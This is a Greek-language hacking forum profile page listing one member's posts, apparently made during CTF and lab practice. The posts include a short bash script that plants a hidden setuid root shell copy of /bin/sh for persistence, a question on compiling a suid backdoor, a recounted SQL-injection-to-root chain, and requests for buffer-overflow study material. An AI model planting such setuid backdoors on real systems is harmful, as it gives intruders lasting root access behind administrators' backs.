Jump to content

xaotikos

Members
  • Content count

    8
  • Joined

  • Last visited

1 Follower

About xaotikos

  • Rank
    Newbie
  1. xaotikos

    Suid Shell Question

    Χμμ, οχι!
  2. xaotikos

    Suid Shell Question

    Χμμ λιγο δυσκολο φιλε pr0n γιατί δεν έχω τα logs και τα παράτησα. Απλά είχα τρέξει ένα local root exploit (πήρα shell από upload form απο admin panel μεσω sqli) και είχα root shell. Πρόσθεσα έναν απλό χρήστη π.χ. systemadmin και ήθελα να έχω suidshell για να προσομοιώσω μια ρεαλιστική επίθεση. Αλλά δυστυχώς δεν μπορούσε να με πετάξει σε rootshell το bashόσκριπτο. Συνέχιζα να είμαι στο group systemadmin και όχι σε uid=0. Έτσι για να εκτελέσω εντολές σαν root έπρεπε να τρέχω κάθε φορά το local root exploit. Ίσως αν το δοκιμάσω σε άλλη περίπτωση να πετύχει. Το θέμα είναι αν αυτός έιναι τεχνικά ο τρόπος για να έχεις access στο μηχάνημα με simple user και μετά να εκτελείς εντολές σαν superuser. Λογικά το bashόσκριπτο δεν είναι σωστό; ΥΓ: Είδα ότι ο hack8 στο άλλο thread πόσταρε ένα άλλο εργαλειάκι για suid, θα το ψάξω, ευχαριστω!
  3. xaotikos

    Suid Shell

    Σ'ευχαριστώ πολύ για την απάντηση σου hack8 θα το κοιταξω Για να χρησιμοποιήσουμε το backdoor που έγραψες λογικά θα πρέπει ως root να το κάνουμε compile + chmod 4755, chown root:root + chmod +s σωστά; ώστε να δουλέψει με simple user
  4. xaotikos

    Suid Shell

    Γεια σας και παλι. Για τις αναγκες καποιοων challenges (lampsecurity κτλπ) εφτιαξα αυτο το lame και μικρο scriptακι για suidshell creation: #!/bin/bash echo "[!] Hidden suid shell creator" echo "[!] Hello :)" if [ `whoami` = root ]; then { echo "[+] uid =0 w00t! trying to create suid shell..." cp /bin/sh .woot chown root:root .woot chmod 4755 .woot } if [ -f .woot ]; then echo "[+] ./woot file created" ls -al .woot else echo "[-] Creating suid file failed. Check permissions" fi else echo "[-] You are not root" fi Το θεμα ειναι οτι ενω δουλευει μια χαρα στο box μου (Debian Squeeze και στο VM μου ubuntu 10.10, 10.04) σε καποια challenges (σε CentOS π.χ.) που ειμαι ηδη root και το εκτελω, ενω μου πεταει shell, οταν παταω id δεν ειναι rootshell. Ξερει κανεις γιατι; Επισης επειδη μερικες φορες λογω: #!/bin/bash δεν εκτελειται, δοκιμασα και να πατησω τις εντολες manually και παλι τπτ. Ενω το shell δημιουργειται δεν ειναι Rootshell. Καμια ιδεα; Ευχαριστω
  5. xaotikos

    Αρχίζοντας Με Bof Και Assembly

    Σ'ευχαριστώ για το reply pr0n. Θα το κοιτάξω!
  6. xaotikos

    Suid Shell Question

    Γειά σας παιδιά ξανά! Μια απορία ξανά: Έφτιαξα ένα lame bashόσκριπτο του στυλ: cp /bin/sh /tmp/.root chmod 4755 /tmp/.root Και ενώ οι δοκιμές σε ubuntu 10.10 και Debian Squeeze πήγαν καλά, δηλαδή δημιουργήθηκε το suid root shell και το εκτέλεσα οκ με απλό -non root- χρήστη, όταν το δοκίμαζα σε challenges τύπου capture the flag σε CentOS, το δημιουργούσε αλλά όταν το εκτελούσα σαν απλός χρήστης από backconnection ή ssh session δεν με πέταγε σε root shell... Τι μπορεί να παίζει; Στο google είδα ότι κάποιοι έβαζαν και το chown root root λέτε αυτό; Ευχαριστώ προκαταβολικά
  7. xaotikos

    Αρχίζοντας Με Bof Και Assembly

    Ευχαριστώ πολύ για τις προτάσεις παιδιά. Θα τα δω και το άρθρο και το book. Να στε καλά ;-) Αν γνωρίζετε και κάποιο real challenge πείτε το
  8. Καλησπέρα! Εϊμαι σχετικά νέος χρήστης στο φόρουμ και γενικά νέος στον χώρο της ασφάλειας Η/Υ και δικτύων. Διάβασα εδώ αρκετά ενδιαφέροντα άρθρα για το Buffer Overflow και μου κίνησε την περιέργεια να το ψάξω και να μάθω περισσότερα. Ειδικά μου άρεσαν κάποια tutorials του Thiseas, pr0n και κάποια ενδιαφέροντα σχόλια του oblique. Απλά μου λείπουν κάποιες γνώσεις βασικές πάνω στην assembly και στα stacks οπότε ζητάω από αυτό το thread κάποιες προτάσεις από που να αρχίσω. Δηλάδή από e-books και challenges ώστε να κατανοήσω τον μηχανισμό καλύτερα. Προσπάθησα το ivanefl0u exploitme challenge αλλά σε VM δεν μου έπαιζε σωστά (δεν έβγαζε error όπως στον pr0n). Υπάρχει κάτι άλλο αντίστοιχο; Επίσης κατάλαβα πως στο θέμα της assembly κατανοώ τα πολύ πολύ βασικά. Μερικές από τις εντολές και τους registers δεν τους ξέρω καν. Ευχαριστώ πολύ προκαταβολικά
×